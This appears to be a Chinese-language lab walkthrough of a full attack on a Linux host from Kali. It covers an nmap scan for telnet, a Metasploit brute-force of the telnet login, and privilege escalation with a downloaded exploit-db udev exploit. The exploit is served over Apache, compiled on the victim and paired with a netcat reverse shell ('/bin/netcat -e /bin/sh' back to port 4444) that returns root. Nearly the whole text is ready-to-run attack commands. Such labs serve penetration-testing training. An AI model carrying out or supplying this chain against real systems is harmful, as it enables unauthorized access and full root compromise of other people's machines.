准备环境:
搭建一台kali和一台Linux即可测试成功
攻击主机:192.168.1.166
被攻击主机:192.168.1.167
在攻击主机中首先利用nmap进行端口扫描,看下被攻击主机是否开启telnet
利用kali进行telnet爆破:
在kali中利用msfconsole进行破解登录telnet
配置好之后然后输入run进行爆破,以下是爆破结果
然后使用sessions -l 查看会话连接
使用sessions -i 1回车进行连接shell,然后输入id查看是否爆破成功
接下来开始提权:
首先在kali中利用内存监听本地4444端口
nc -lvp 4444
在kali中搭建网站并下载下载exploit文件http://www.exploit-db.com/download/8572文件
wget http://www.exploit-db.com/download/8572
然后开启kali中Apache2网站,然后查看网站状态是否开启
service apache2 start
service apache2 status
把下载好的exploit,复制到网站根目录,并命名为test.c
mv 8572 /var/www/html/test.c
被攻击端下载test.c文件
wget http://192.168.1.166/test.c
# 下一步进行编译,并输入内容到/tmp/run文件当中
gcc test.c -o exploit
echo "#!/bin/sh">/tmp/run
echo '/bin/netcat -e /bin/sh 192.168.1.166 4444' >> /tmp/run
# 过滤udev
ps -edf | grep udev
最后执行exploit具有root权限的pid -1
查看监听状态,输入whoami查看返回值为root表明已提权成功!